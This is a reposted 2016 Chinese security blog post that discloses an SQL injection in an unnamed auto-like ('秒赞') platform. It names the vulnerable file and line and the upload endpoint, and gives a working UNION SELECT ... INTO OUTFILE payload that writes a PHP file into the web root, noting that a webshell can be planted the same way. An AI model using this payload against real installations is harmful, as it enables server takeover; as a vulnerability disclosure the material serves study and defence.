某秒赞平台通用getshell漏洞-[php函数未过滤]

怪狗 2016-7-29 HACK 0 0

  虽然文件夹下面有/includes/360safe/,但是根本无法拦截我们getshell:

  此次存在问题文件:/template/public/sc.php

  问题代码在217行:

      某秒赞平台通用getshell漏洞-[php函数未过滤]

  $rowm1=$DB->get_row("SELECT * FROM ".DBQZ."_job WHERE url='{$val}' limit 1");

  看到这里url='{$val}' 没有经过任何过滤,直接带入sql语句

  我们看看利用地方:index.php?mod=sc&my=upload&sys=1

  位于文件导入:

        某秒赞平台通用getshell漏洞-[php函数未过滤]

  我们看看sql语句做了什么:www.baidu.com 为监控网站

        某秒赞平台通用getshell漏洞-[php函数未过滤]

  可以看出这个是做一个对比语句,如果网址存在则返回一个,网址不存在就直接添加进去。那么

  SELECT * FROM wjob_job WHERE url='http://www.baidu.com/' limit 1

  这里是没有过滤的,我们可以构造语句来写wenshell等等,由于是演示,就直接写:

  D:/xampp/htdocs/www

  我们构造一个语句:

SELECT * FROM wjob_job WHERE url='http://www.baidu.com/' AND 1 =1 UNION SELECT 1 , 2, 3, '<?php phpinfo() ?>', 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23 INTO OUTFILE 'D:/xampp/htdocs/www/sss.php';#

  配合路径就能直接写进去:新建个txt写上语句

某秒赞平台通用getshell漏洞-[php函数未过滤]

     某秒赞平台通用getshell漏洞-[php函数未过滤]

  然后从新导入一个任务

      某秒赞平台通用getshell漏洞-[php函数未过滤]

  看看执行l了:

    某秒赞平台通用getshell漏洞-[php函数未过滤]

  成功写入文件:

       某秒赞平台通用getshell漏洞-[php函数未过滤]

  这里能做的不仅仅是getshell,提供了思路,大牛们可以继续挖掘深入。

  文章组织的不是很好,还请大家见谅。

原文地址:https://www.77169.com/hack/201602/224279.shtm

转载请注明来自华盟网,本文标题:《某秒赞平台通用getshell漏洞-[php函数未过滤]》

喜欢 (0) 发布评论